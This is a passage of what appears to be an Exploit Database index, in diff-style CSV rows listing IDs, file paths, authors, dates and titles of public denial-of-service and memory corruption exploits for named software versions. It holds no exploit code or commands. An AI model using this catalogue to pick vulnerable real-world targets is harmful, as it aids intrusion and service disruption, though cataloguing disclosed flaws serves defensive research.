Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos, -30672,exploits/windows/dos/30672.txt,"Live for Speed - Skin Name Buffer Overflow",2007-10-13,"Luigi Auriemma",windows,dos, -30679,exploits/hardware/dos/30679.pl,"Nortel Networks - Multiple UNIStim VoIP Products Remote Eavesdrop Vulnerabilities",2007-10-18,"Daniel Stirnimann",hardware,dos, -30805,exploits/windows/dos/30805.html,"RichFX Basic Player 1.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-25,"Elazar Broad",windows,dos, -30688,exploits/hardware/dos/30688.py,"Motorola SBG6580 Cable Modem & Wireless Router - Reboot (Denial of Service)",2014-01-04,nicx0,hardware,dos, -30702,exploits/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 - Malformed XBL Constructor Remote Denial of Service",2007-10-22,"Soroush Dalili",multiple,dos, -30713,exploits/multiple/dos/30713.html,"Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial of Service",2007-10-26,"The Hacker Webzine",multiple,dos, -30714,exploits/unix/dos/30714.pl,"IBM Lotus Domino 7.0.2 - IMAP4 LSUB Buffer Overflow",2007-10-27,"Manuel Santamarina Suarez",unix,dos, -30724,exploits/linux/dos/30724.txt,"Perdition 1.17 - IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",linux,dos, -30744,exploits/linux/dos/30744.txt,"MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial of Service",2007-11-05,"Joe Gallo",linux,dos, -30749,exploits/windows/dos/30749.html,"Microsoft Office 2003 - Web Component Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",windows,dos, -30753,exploits/php/dos/30753.txt,"AutoIndex PHP Script 2.2.2/2.2.3 - 'index.php' Denial of Service",2007-11-12,L4teral,php,dos, -30756,exploits/windows/dos/30756.html,"Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service",2007-11-12,"Elazar Broad",windows,dos, -30760,exploits/php/dos/30760.txt,"PHP 5.2.5 - Multiple GetText functions Denial of Service Vulnerabilities",2007-11-13,"laurent gaffie",php,dos, -30761,exploits/windows/dos/30761.html,"WebEx GPCContainer - Memory Access Violation Multiple Denial of Service Vulnerabilities",2007-11-13,"Elazar Broad",windows,dos, -30763,exploits/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos, -40602,exploits/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos, -30766,exploits/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - 'safer_name_suffix' Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos, -30767,exploits/windows/dos/30767.html,"Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow",2007-06-25,"Azizov E",windows,dos, -40604,exploits/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos, -30776,exploits/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service",2007-11-19,"Luigi Auriemma",linux,dos, -30779,exploits/multiple/dos/30779.txt,"Rigs of Rods 0.33d - 'Vehicle Name' Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos, -30974,exploits/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service",2008-01-02,greyvoip,multiple,dos, -30812,exploits/windows/dos/30812.html,"RealMedia RealPlayer 10.5/11 - 'ierpplug.dll' PlayerProperty ActiveX Control Buffer Overflow",2007-11-26,"Elazar Broad",windows,dos, -30814,exploits/multiple/dos/30814.txt,"Skype 3.6.216 - Voicemail URI Handler Remote Denial of Service",2007-11-26,"Critical Security",multiple,dos, -30825,exploits/windows/dos/30825.html,"Microsoft Windows Media Digital Rights Management - ActiveX Control Buffer Overflow",2006-10-09,"Joxean Koret",windows,dos, -30832,exploits/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper - Class ActiveX Control Remote Buffer Overflow Denial of Service",2007-11-29,"Elazar Broad",windows,dos, -30837,exploits/linux/dos/30837.txt,"QEMU 0.9 - Translation Block Local Denial of Service",2007-11-30,TeLeMan,linux,dos, -30840,exploits/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 - Remote Format String",2007-12-04,"SEC Consult",windows,dos, -30856,exploits/multiple/dos/30856.txt,"Easy File Sharing Web Server 1.3x/4.5 - Directory Traversal / Multiple Information Disclosure Vulnerabilities",2007-12-07,"Luigi Auriemma",multiple,dos, -30885,exploits/multiple/dos/30885.txt,"QK SMTP Server - Malformed Commands Multiple Remote Denial of Service Vulnerabilities",2007-12-13,"Juan Pablo Lopez Yacubian",multiple,dos, -30894,exploits/linux/dos/30894.txt,"PeerCast 0.12 - HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos, -30895,exploits/linux/dos/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service",2007-12-17,beSTORM,linux,dos, -30896,exploits/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 - Remote Denial of Service",2007-12-17,"Chris Castaldo",multiple,dos, -30898,exploits/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP - 'asn1_get_string()' Remote Buffer Overflow",2007-11-06,wei_wang,linux,dos, -30902,exploits/linux/dos/30902.c,"Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service",2007-12-19,"Clemens Kurtenbach",linux,dos, -30903,exploits/multiple/dos/30903.c,"id3lib ID3 Tags - Buffer Overflow",2007-12-19,"Luigi Auriemma",multiple,dos, -30906,exploits/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos, -30922,exploits/multiple/dos/30922.c,"WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow",2007-12-21,"Luigi Auriemma",multiple,dos, -30956,exploits/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos, -30934,exploits/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",windows,dos, -30936,exploits/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos, -30942,exploits/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos, -30943,exploits/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos, -30985,exploits/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow",2007-12-30,"Devon Miller",linux,dos, -30989,exploits/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos, -30990,exploits/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 - Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos, -30991,exploits/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 - NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos, -31002,exploits/linux/dos/31002.txt,"Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos, -31014,exploits/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 -31018,exploits/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos, -31021,exploits/osx/dos/31021.html,"Apple Safari 2.0.4 - KHTML WebKit Remote Denial of Service",2008-01-12,"David Barroso",osx,dos, -31054,exploits/linux/dos/31054.txt,"SDL_image 1.2.6 - Invalid '.GIF' File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos, -31057,exploits/ios/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,ios,dos, -31100,exploits/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos, -31102,exploits/hardware/dos/31102.c,"MikroTik RouterOS 3.0 - SNMP SET Denial of Service",2008-02-04,ShadOS,hardware,dos, -31105,exploits/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos, -31114,exploits/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos, -31122,exploits/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos, -31128,exploits/multiple/dos/31128.txt,"IEA Software (Multiple Products) - POST Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos, -31136,exploits/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String / Denial of Service Vulnerabilities",2008-02-11,"Luigi Auriemma",multiple,dos, -31138,exploits/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos, -31139,exploits/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - 'LstNPS' Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos, -31148,exploits/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos, -31150,exploits/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",multiple,dos, -31306,exploits/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service",2008-02-26,sipherr,hardware,dos, -31307,exploits/android/dos/31307.py,"Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow",2008-03-04,"Alfredo Ortega",android,dos, -31168,exploits/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 - '.EBP' Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos, -31176,exploits/windows/dos/31176.html,"MW6 Technologies Aztec - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos, -31177,exploits/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos, -31178,exploits/windows/dos/31178.html,"MW6 Technologies MaxiCode - ActiveX 'Data' Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos, -31305,exploits/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)",2014-01-31,"Kees Cook",linux,dos, -31271,exploits/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos, -31203,exploits/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 - IFrame Recursion Remote Denial of Service",2008-02-15,"Carl Hardwick",multiple,dos, -31205,exploits/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos, -31218,exploits/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos, -31220,exploits/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos, -31222,exploits/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos, -31223,exploits/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos, -31232,exploits/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos, -40356,exploits/multiple/dos/40356.txt,"Adobe Flash - Method Calls Use-After-Free",2016-09-08,"Google Security Research",multiple,dos, -31333,exploits/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service",2008-03-04,sipherr,bsd,dos, -31330,exploits/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos, -40355,exploits/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Infomation Leak",2016-09-08,"Google Security Research",multiple,dos, -31285,exploits/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos, -31300,exploits/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos, -31301,exploits/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos, -31302,exploits/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Null Pointer Denial of Service",2008-02-25,"Luigi Auriemma",windows,dos, -31308,exploits/android/dos/31308.html,"Google Android Web Browser - '.BMP' File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos, -31310,exploits/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow / Denial of Service",2008-02-27,"Luigi Auriemma",windows,dos, -31323,exploits/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password - Remote Denial of Service",2008-03-01,"Maks M",windows,dos, -31327,exploits/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos, -31338,exploits/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos, -31343,exploits/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow",2008-03-06,"Chris Evans",multiple,dos, -31360,exploits/windows/dos/31360.txt,"MailEnable 3.13 - IMAP Service Multiple Remote Vulnerabilities",2008-03-07,"Luigi Auriemma",windows,dos, -31361,exploits/windows/dos/31361.txt,"Microsoft Office 2000/2003/2004/XP - File Memory Corruption",2008-03-07,anonymous,windows,dos, -31363,exploits/windows/dos/31363.txt,"Panda Internet Security/AntiVirus+Firewall 2008 - 'CPoint.sys' Memory Corruption",2008-03-08,"Tobias Klein",windows,dos, -31376,exploits/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos, -31378,exploits/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Null Pointer Denial of Service",2008-03-10,"Luigi Auriemma",multiple,dos, -31381,exploits/windows/dos/31381.txt,"Motorola Timbuktu Pro 8.6.5 - Multiple Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,dos, -31394,exploits/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos, -31696,exploits/windows/dos/31696.txt,"Computer Associates eTrust Secure Content Manager 8.0 - 'eCSqdmn' Remote Denial of Service",2008-04-22,"Luigi Auriemma",windows,dos, -31461,exploits/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow",2014-02-06,"Core Security",windows,dos, -31399,exploits/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String",2008-03-12,"Luigi Auriemma",windows,dos, -31403,exploits/unix/dos/31403.txt,"Zabbix 1.1x/1.4.x - File Checksum Request Denial of Service",2008-03-13,"Milen Rangelov",unix,dos, -31429,exploits/multiple/dos/31429.py,"VideoLAN VLC Media Player 2.1.2 - '.asf' Crash (PoC)",2014-02-05,Saif,multiple,dos, -31440,exploits/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos, -31444,exploits/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos, -31478,exploits/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling - Denial of Service",2008-03-24,sipherr,hardware,dos, -31522,exploits/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 -31542,exploits/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos, -31984,exploits/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",linux,dos, -31550,exploits/bsd/dos/31550.c,"BSD (Multiple Distributions) - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos, -31552,exploits/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Denial of Service",2008-03-28,"Peter Makrai",linux,dos, -31553,exploits/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Denial of Service",2008-03-28,"Peter Makrai",linux,dos, -31554,exploits/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Denial of Service",2008-03-28,"Peter Makrai",linux,dos, -31563,exploits/windows/dos/31563.txt,"SLmail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos, -31585,exploits/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,windows,dos, -31592,exploits/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos, -31593,exploits/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos, -31594,exploits/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos, -31607,exploits/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service",2008-04-04,ryujin,windows,dos, -31615,exploits/multiple/dos/31615.rb,"Apache Commons FileUpload and Apache Tomcat - Denial of Service",2014-02-12,"Trustwave's SpiderLabs",multiple,dos, -31619,exploits/osx/dos/31619.ics,"Apple iCal 3.0.1 - 'TRIGGER' Denial of Service",2008-04-21,"Rodrigo Carvalho",osx,dos, -31620,exploits/osx/dos/31620.ics,"Apple iCal 3.0.1 - 'ATTACH' Denial of Service",2008-04-21,"Core Security Technologies",osx,dos, -31627,exploits/unix/dos/31627.c,"LICQ 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos, -31629,exploits/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos, -31635,exploits/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial of Service",2008-04-10,ryujin,windows,dos, -31656,exploits/windows/dos/31656.txt,"ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow",2008-04-16,"Leon Juranic",windows,dos, -31707,exploits/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial of Service",2008-04-24,"Luigi Auriemma",windows,dos, -31710,exploits/novell/dos/31710.txt,"Novell Groupwise 7.0 - HTML Injection / Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos, -31711,exploits/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos, -40825,exploits/windows/dos/40825.py,"Remote Utilities Host 6.3 - Denial of Service",2016-11-24,"Peter Baris",windows,dos, -31713,exploits/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos, -31728,exploits/multiple/dos/31728.txt,"Call of Duty 4 1.5 - 'stats' Denial of Service",2008-05-02,"Luigi Auriemma",multiple,dos, -31748,exploits/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption",2008-05-06,Sowhat,windows,dos, -31761,exploits/linux/dos/31761.txt,"Embedthis Goahead WebServer 3.1.3-0 - Multiple Vulnerabilities",2014-02-19,"Maksymilian Motyl",linux,dos,80 -31762,exploits/windows/dos/31762.py,"Catia V5-6R2013 - 'CATV5_AllApplications' Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",windows,dos,55555 -31763,exploits/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000 -31785,exploits/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service",2008-05-13,"Tyler Reguly",multiple,dos, -31791,exploits/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 -40849,exploits/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,windows,dos, -31815,exploits/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos, -31817,exploits/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos, -31818,exploits/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos, -31819,exploits/windows/dos/31819.pl,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)",2008-05-21,"Praveen Darshanam",windows,dos, -31856,exploits/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite",2008-05-28,Nine:Situations:Group,windows,dos, -31872,exploits/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow",2008-06-04,"Alfredo Ortega",multiple,dos, -31876,exploits/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method",2008-06-03,"Dennis Rand",windows,dos, -31877,exploits/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos, -31878,exploits/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos, -31879,exploits/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos, -31884,exploits/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos, -31889,exploits/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos, -31899,exploits/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos, -31914,exploits/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos, -31915,exploits/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80 -31919,exploits/multiple/dos/31919.c,"S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service",2008-06-15,"Luigi Auriemma",multiple,dos, -31931,exploits/multiple/dos/31931.txt,"Crysis 1.21 - HTTP/XML-RPC Service Remote Denial of Service",2008-06-16,"Luigi Auriemma",multiple,dos, -31932,exploits/multiple/dos/31932.txt,"Skulltag 0.97 d2-RC3 - Malformed Packet Denial of Service",2008-06-16,"Luigi Auriemma",multiple,dos, -31934,exploits/windows/dos/31934.txt,"Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption",2008-06-17,"Ivan Sanchez",windows,dos, -31957,exploits/multiple/dos/31957.txt,"World in Conflict 1.008 - Null Pointer Remote Denial of Service",2008-06-23,"Luigi Auriemma",multiple,dos, -31958,exploits/multiple/dos/31958.txt,"SunAge 1.8.1 - Multiple Denial of Service Vulnerabilities",2008-06-23,"Luigi Auriemma",multiple,dos, -31964,exploits/windows/dos/31964.txt,"5th street - 'dx8render.dll' Format String",2008-06-25,superkhung,windows,dos, -31965,exploits/linux/dos/31965.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos, -31966,exploits/linux/dos/31966.c,"Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos, -31968,exploits/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - '.Playlist' File Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos, -32095,exploits/linux/dos/32095.pl,"Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos, -31979,exploits/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos, -31998,exploits/multiple/dos/31998.txt,"S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 - Multiple Remote Vulnerabilities",2008-06-28,"Luigi Auriemma",multiple,dos, -31999,exploits/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x - Adding 'ibm-globalAdminGroup' Entry Denial of Service",2008-06-30,anonymous,multiple,dos, -32000,exploits/linux/dos/32000.txt,"OpenLDAP 2.3.41 - BER Decoding Remote Denial of Service",2008-06-30,"Cameron Hotchkies",linux,dos, -32006,exploits/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service Vulnerabilities",2008-06-30,"Noam Rathus",multiple,dos, -32009,exploits/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos, -32018,exploits/linux/dos/32018.txt,"Firefox / Evince / EoG / GIMP - '.SVG' File Processing Denial of Service",2008-07-08,"Kristian Hermansen",linux,dos, -32019,exploits/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,linux,dos, -32054,exploits/windows/dos/32054.py,"MediaMonkey 3.0.3 - URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,windows,dos, -32056,exploits/windows/dos/32056.py,"BitComet 1.02 - URI Handling Remote Denial of Service",2008-07-16,Shinnok,windows,dos, -32086,exploits/multiple/dos/32086.c,"SWAT 4 - Multiple Denial of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos, -32104,exploits/multiple/dos/32104.txt,"ZDaemon 1.8 - Null Pointer Remote Denial of Service",2008-07-21,"Luigi Auriemma",multiple,dos, -32105,exploits/windows/dos/32105.pl,"PowerDVD 8.0 - '.m3u' / '.pls' Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos, -32112,exploits/linux/dos/32112.txt,"Minix 3.1.2a - Psuedo Terminal Denial of Service",2008-07-23,kokanin,linux,dos, -32125,exploits/multiple/dos/32125.txt,"Unreal Tournament 2004 - Null Pointer Remote Denial of Service",2008-07-30,"Luigi Auriemma",multiple,dos, -32127,exploits/multiple/dos/32127.txt,"Unreal Tournament 3 - Memory Corruption (Denial of Service)",2008-07-30,"Luigi Auriemma",multiple,dos, -32136,exploits/osx/dos/32136.html,"Apple Mac OSX 10.x - CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos, -32192,exploits/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos, -32193,exploits/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos, -32194,exploits/multiple/dos/32194.txt,"Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service",2008-08-06,Antunes,multiple,dos, -32195,exploits/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of 